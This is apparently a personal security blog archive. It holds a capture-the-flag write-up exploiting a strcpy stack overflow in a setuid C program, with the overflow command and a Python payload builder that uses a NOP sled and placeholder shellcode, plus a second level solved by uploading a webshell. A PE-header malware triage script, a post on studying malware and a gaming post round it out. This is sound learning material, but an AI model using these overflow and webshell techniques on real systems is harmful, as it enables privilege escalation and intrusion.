Thursday, August 8, 2013

STS: Login - Level 2

This level gives us a binary and some code. There’s also an alternative challenge (I may get to this another time). Here’s the code we are working with:



#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(int argc, const char **argv) {
    if (argc < 2) {
        printf("Fail. More Args...\n");
        return 1;
    } else {
        /* make the real uid match the setuid effective uid so a spawned shell keeps it */
        setresuid(geteuid(), geteuid(), geteuid());
        char buf2[4096];
        char buf[16];
        const char password[] = "XXXXXXXXXXX";   /* redacted in this write-up */
        strncpy(buf, argv[1], sizeof(buf) - 1);
        if (strcmp(buf, password) != 0) {
            printf("Wrong.\n");
            return 1;
        } else {
            /* argv[2] is copied with no length check (and is NULL if only the
               password was given): this is the overflow */
            strcpy(buf2, argv[2]);
            printf("%s", buf2);
            return 0;
        }
    }
}

We can see in the code that there are two buffers, and that the second one, buf2, is filled with the insecure strcpy function: argv[2] is copied into the 4096-byte buffer with no length check. However, to get to this segment of code we need to know the password. To get it I ran "strings" on the binary and was able to quickly pick out the password (it is a plain string constant, so it sits in the binary in the clear). Now, if I run the program with the password, I can attempt to overflow the second buffer.


$ ./level2 [removed] `python -c 'print "A" * 5000'`


I get a segmentation fault. We can see in gdb that we overwrite EIP with A's (0x41414141), so the saved return address is under our control.


[gdb screenshot: EIP overwritten with A's]



Now all we need to do is craft our basic exploit and get the key! :)
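The next step after seeing 0x41414141 in EIP is to find exactly how many bytes of argv[2] sit before the saved return address, then lay out the payload around that offset. The script below is an added example and not part of the original post or the challenge: it generates a Metasploit-style cyclic pattern (every 4-byte window is unique, so the value that lands in EIP identifies the offset), recovers the offset from a crash value, and builds a filler + return address + NOP sled + shellcode payload. The simulated crash offset 4108, the return address 0xbffff5c4 and the int3 bytes standing in for shellcode are constructed placeholders, not values from the level2 binary.

```python
import string
import struct


def cyclic_pattern(length):
    """Metasploit-style pattern_create output: 'Aa0Aa1Aa2...'. Every 4-byte
    window is unique for the first 20280 bytes, so whatever lands in EIP
    pinpoints the offset of the saved return address."""
    chunks, n = [], 0
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                chunks.append(u + l + d)
                n += 3
                if n >= length:
                    return "".join(chunks)[:length]
    raise ValueError("pattern longer than 20280 bytes is no longer unique")


def eip_value_at(pattern, offset):
    """The 32-bit little-endian value gdb would show in $eip if
    pattern[offset:offset+4] overwrote the saved return address.
    Used here to simulate the crash offline."""
    return struct.unpack("<I", pattern[offset:offset + 4].encode("ascii"))[0]


def pattern_offset(pattern, crash_eip):
    """Given the $eip value from the crash, return how many bytes precede the
    saved EIP in the pattern, or -1 if the value is not from the pattern."""
    needle = struct.pack("<I", crash_eip).decode("latin-1")
    return pattern.find(needle)


def build_payload(offset, ret_addr, shellcode, total_len, nop=b"\x90"):
    """Layout: [offset filler bytes][ret_addr over saved EIP][NOP sled][shellcode].
    ret_addr should point into the sled, which sits above the saved EIP."""
    filler = b"A" * offset
    ret = struct.pack("<I", ret_addr)
    sled_len = total_len - len(filler) - len(ret) - len(shellcode)
    if sled_len < 0:
        raise ValueError("total_len too small for offset + return address + shellcode")
    payload = filler + ret + nop * sled_len + shellcode
    # strcpy() stops at the first NUL and argv strings cannot carry one, so a
    # NUL in the return address or shellcode silently truncates the overflow.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; strcpy() would truncate it")
    return payload


if __name__ == "__main__":
    pat = cyclic_pattern(5000)            # same length as the 5000 A's above
    # Constructed crash: pretend gdb reported this $eip after a run with the pattern.
    crash_eip = eip_value_at(pat, 4108)
    off = pattern_offset(pat, crash_eip)
    print("saved EIP is at offset", off)
    # Placeholder return address and int3 'shellcode'; not values from the challenge.
    exploit = build_payload(off, 0xbffff5c4, b"\xcc" * 4, 5000)
    with open("payload.bin", "wb") as fh:
        fh.write(exploit)
    print('run as: ./level2 <password> "$(cat payload.bin)"')
```

In practice you run the binary once under gdb with `cyclic_pattern(5000)` as argv[2], feed the reported $eip to `pattern_offset`, and then pick a return address inside the NOP sled from the stack addresses gdb shows; the NUL check matters because a single 0x00 in the address or shellcode ends the copy early and the saved EIP is never reached.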

Tuesday, August 6, 2013

STS: Logic - Level 1


This challenge was fairly easy like all level 1s. We have a web app with a file upload. The hint tells us that files are uploaded to the /uploads/ folder and to take a look at the users' home directories for clues. I uploaded a tiny webshell and headed to /home/level1. I noticed that there is a file called "README". This file says that we are close but not to look so far. Since this is a Linux machine, the next obvious place to check is the .bash_history file. Bingo! There's the password.

Sunday, July 21, 2013

Practical Malware Analysis Chapter 1

This chapter was about basic static analysis. It went over tools to quickly analyze a Windows binary to see if it contains malware. Examples of the basic steps include: using VirusTotal to scan the binary against numerous AVs; checking the compilation timestamp; using PEiD to see if the binary is packed; and using tools to inspect the PE headers for clues of malicious intent and packing.
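Two of those header checks (compilation timestamp and signs of packing) can be done by hand without PEiD. The script below is an added example, not code from the book or from the blog: it walks the MZ header to e_lfanew, reads the COFF header's TimeDateStamp and the section table, and flags sections whose byte entropy is near 8 bits, that are empty on disk but large in memory, or that carry the well-known UPX section names. The PE it inspects is constructed in the block itself (headers, section table and raw data only; it is not a runnable executable), and the timestamp 1370000000 and section contents are made up for the demo.

```python
import collections
import datetime
import math
import struct

PACKER_SECTION_NAMES = {b"UPX0", b"UPX1"}   # section names UPX leaves behind


def shannon_entropy(buf):
    """Bits per byte, 0.0 .. 8.0; compressed or encrypted data sits near 8."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum((c / n) * math.log2(c / n) for c in collections.Counter(buf).values())


def parse_pe(data):
    """Walk MZ -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section table and return
    the compile timestamp plus per-section sizes and entropy."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    (machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, _chars) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    sect_table = e_lfanew + 4 + 20 + opt_size      # section table follows the optional header
    sections = []
    for i in range(nsections):
        (name, vsize, _vaddr, raw_size, raw_ptr, _rel, _lin, _nrel, _nlin,
         _sc) = struct.unpack_from("<8sIIIIIIHHI", data, sect_table + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\x00"), "virtual_size": vsize,
                         "raw_size": raw_size, "entropy": shannon_entropy(raw)})
    compiled = datetime.datetime.fromtimestamp(timestamp, tz=datetime.timezone.utc)
    return {"machine": machine, "timestamp": timestamp,
            "compiled_utc": compiled.isoformat(), "sections": sections}


def looks_packed(section):
    """Packing heuristics: near-random section data, a section that is empty on
    disk but large in memory (where the stub unpacks to), or a packer's name."""
    return (section["entropy"] > 7.0
            or (section["raw_size"] == 0 and section["virtual_size"] > 0)
            or section["name"] in PACKER_SECTION_NAMES)


def build_sample_pe(timestamp, sections):
    """Constructed minimal PE for the demo: DOS stub, COFF header, a zeroed PE32
    optional header, section table and raw data. Parses, but does not run."""
    e_lfanew = 0x40
    opt = struct.pack("<H", 0x10B) + b"\x00" * 222        # PE32 optional header, 224 bytes
    hdr_end = e_lfanew + 4 + 20 + len(opt) + 40 * len(sections)
    table, blobs, cursor = b"", b"", hdr_end
    for name, vsize, raw in sections:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\x00"), vsize, 0x1000,
                             len(raw), cursor if raw else 0, 0, 0, 0, 0, 0x60000020)
        blobs += raw
        cursor += len(raw)
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp,
                                       0, 0, len(opt), 0x0102)
    return dos + coff + opt + table + blobs


# Constructed sample: a normal-looking .text, plus the UPX0/UPX1 pair a packed file shows.
SAMPLE = build_sample_pe(1370000000, [
    (b".text", 0x1000, b"\x55\x89\xe5" * 300),          # push ebp; mov ebp,esp; low entropy
    (b"UPX0", 0x8000, b""),                             # empty on disk, large in memory
    (b"UPX1", 0x1000, bytes(range(256)) * 16),          # uniform bytes: entropy exactly 8.0
])


def triage(data):
    info = parse_pe(data)
    info["packed_sections"] = [s["name"].decode() for s in info["sections"] if looks_packed(s)]
    return info


if __name__ == "__main__":
    r = triage(SAMPLE)
    print("compiled:", r["compiled_utc"])
    for s in r["sections"]:
        print(f"{s['name'].decode():8} raw={s['raw_size']:6} vsize={s['virtual_size']:#7x} "
              f"entropy={s['entropy']:.2f}")
    print("packed sections:", r["packed_sections"])
```

To use it on a real file, pass `open(path, "rb").read()` to `triage`. The timestamp is worth a sanity check rather than trust: it is a plain field the author can set, so a date in the future or before the tooling existed is itself a clue.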

The labs are fun and give practical hands-on exercise. There are tons of books out there, but the best ones give labs or some kind of practice. The labs go from easy to hard, and the solutions in the back are verbose, so you know what you missed and how to solve the questions.

Really loving this book so far and am taking my time to really learn the material.

Monday, July 15, 2013

A Dive Into Malware

I don't understand why companies continually remove social engineering and client-side attacks from scope. I think it's great that companies are getting their applications and external networks pentested, but attackers are, and have always been, getting into companies. How? By having your employees run malware on their machines.

0-days are great. They also aren't the most used method of gaining access to your system. In my personal experience, I've almost ALWAYS had a user run benign 'malware' just as a proof of concept. Because of this, I think I'm going to start by jumping into malware development and analysis. Humans are stupid, and I'll exploit that.

I'm going to start by reading http://www.amazon.com/Practical-Malware-Analysis-Dissecting-Malicious/dp/1593272901. Really looking forward to this read and the hands on labs. I also hope to come up with all types of malware examples to use on a pentest. If I don't ever use them but you do (legally), please share with me your experiences and let me taste your victories.

Note: This is a random blog post. Mostly a reminder for me why I'm doing this again.

Sunday, June 30, 2013

LCS

Oh boy,

LCS is back for the summer split and it is intense. As usual, when gaming championships are on, I take a break from security. Sorry if you don't see much in the next few weeks since LCS is on.

I'm relatively new to LoL but not to MOBAs. I think I really enjoy playing AP Carry, but I'm still getting a feel for all the positions. I definitely enjoy watching the pros play. Watch, learn, mimic. I feel this cycle is what I've always done when improving gaming skills. Hopefully I can pick up a few tricks by watching some YouTube and Twitch videos of pros playing.

I've really taken an interest in @dscarra. His videos are pretty funny, and he talks a decent amount, letting me know his thought process and why he did what he did. Because of scarra, I've been cheering for Dignitas throughout the LCS summer split season. He and Kiwi definitely help me choose my "root for" team.

Good luck guys!